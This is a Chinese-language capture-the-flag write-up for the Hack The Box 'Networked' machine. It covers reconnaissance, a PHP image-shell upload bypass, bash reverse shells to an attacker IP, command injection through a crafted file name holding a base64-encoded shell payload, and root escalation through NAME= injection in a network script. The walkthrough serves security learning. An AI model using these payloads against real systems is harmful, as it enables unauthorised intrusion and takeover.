0x00.前言
。
0x01.信息收集
nmap -sC -sV 10.10.10.146
nmap -p- -min-rate 1000 10.10.10.146
nmap -p 22,80,443 -sC -sV 10.10.10.146
开放端口:
22 ssh
80 httpferoxbuster -u http://10.10.10.146/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
发现了两个目录:/uploads,/backup。
0x02.代码审计文件上传拿低权限shell
/uploads没有东西,/backup有一个backup.tar,似乎是个备份文件,下载解压有四个文件,如下:
应该就是网站的备份文件了,访问/upload.php存在,证实猜测的不假。
有文件上传的地方,还有后端的源代码文件,意图应该很明显了,大概率就是让我们审计源码然后绕过上传。
分析uploads.php,可以注意到用require包含了同目录的lib.php,lib.php定义了几个在uploads.php中用到的函数。
mime_content_type函数检测文件的MIME类型,
然后检测MIME字段是否含有'image/',如果有则返回真。所以为了绕过这里,必须要修改MIME字段的值。
接着定义了一个只有图片后缀的数组,上传文件的文件名会被取出与数组进行比对,只有符合的后缀能够上传。
所以可以制作一个图片马上传,
copy 1.jpg/b +2.php shell.php.jpg
成功上传,上传的图片会在/photos.php展示,如下:
图片马被重命名了,访问一下,
图片没有正常显示,乱码了,因为服务器未配置为.png使用 php 解释器处理文件,所以图片马虽然是jpg后缀,却被当作php文件执行,尝试执行命令,如下:
执行成功,再反弹shell,
bash+-i+>%26+/dev/tcp/10.10.14.2/4444+0>%261 //&需要编码
0x03.定时任务拿用户shell
在/home/guly/有两个文件,
check_attack.php:
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";
$files = array();
$files = preg_grep('/^([^.])/', scandir($path));
foreach ($files as $key => $value) {
$msg='';
if ($value == 'index.html') {
continue;
}
#echo "-------------\n";
#print "check: $value\n";
list ($name,$ext) = getnameCheck($value);
$check = check_ip($name,$value);
if (!($check[0])) {
echo "attack!\n";
# todo: attach file
file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
mail($to, $msg, $msg, $headers, "-F$value");
}
}
?>crontab.guly:
*/3 * * * * php /home/guly/check_attack.php根据两文件内容,推断应该有定时任务,上传pspy监听(服务器没有wget,用curl代替):
curl http://10.10.14.2:5555/pspy32 -o pspy32 --progress传输完成,执行pspy,
可以观测到/usr/sbin/crond -n在以每3分钟一次的频率执行。
确定以后再来审计check_attack.php,
重点关注exec这种命令执行函数,其中变量$value的值是/uploads目录下的文件名,可以通过创建文件控制变量值,从而达到命令执行的效果,那么直接反弹shell,如下:
echo -n 'bash -c "bash -i >& /dev/tcp/10.10.14.2/6666 0>&1"' | base64
touch ';echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yLzY2NjYgMD4mMSI=| base64 -d | bash'
tips:对payload编码是有过滤,不允许文件名有符号'/'。现在,我们拿到了guly用户的shell,
0x04.SUDO提权
guly用户可以以root身份执行一个脚本(/usr/local/sbin/changename.sh),如下:
查看脚本内容,
changename.sh:
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_\ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0这个脚本只是为调用的接口创建一个网络脚本,要求用户提供以下选项NAME,PROXY_METHOD,BROWSER_ONLY,BOOTPROTO
,我们只关注NAME选项,因为根据这个页面,我们可以在此执行命令,用户输入的空格之后的内容都会被以root身份当作命令执行。
Hi there,
Just found an issue in Redhat/CentOS which according to RedHat security team is not an issue. I don't know, sounds
weird to me.
If, for whatever reason, a user is able to write an ifcf-<whatever> script to /etc/sysconfig/network-scripts or it can
adjust an existing one, then your system in pwned.
Network scripts, ifcg-eth0 for example are used for network connections. The look exactly like .INI files. However,
they are ~sourced~ on Linux by Network Manager (dispatcher.d).
In my case, the NAME= attributed in these network scripts is not handled correctly. If you have white/blank space in
the name the system tries to execute the part after the white/blank space. Which means; everything after the first
blank space is executed as root.
For example:
/etc/sysconfig/network-scripts/ifcfg-1337
NAME=Network /bin/id <= Note the blank space
ONBOOT=yes
DEVICE=eth0
Yes, any script in that folder is executed by root because of the sourcing technique. Ex: .
/etc/sysconfig/network-scripts/ifcfg-1337
Me as a developer, I don't really get why you want to do it like this. Its just <~>
So, if a use manage to get his hands on any of these files your box is gone. Protect them with your life.所以,
现在,我们拿到了root。
0x05.总结
参考文章:
https://0xdf.gitlab.io/2019/11/16/htb-networked.html
https://0xrick.github.io/hack-the-box/networked/
Comments | NOTHING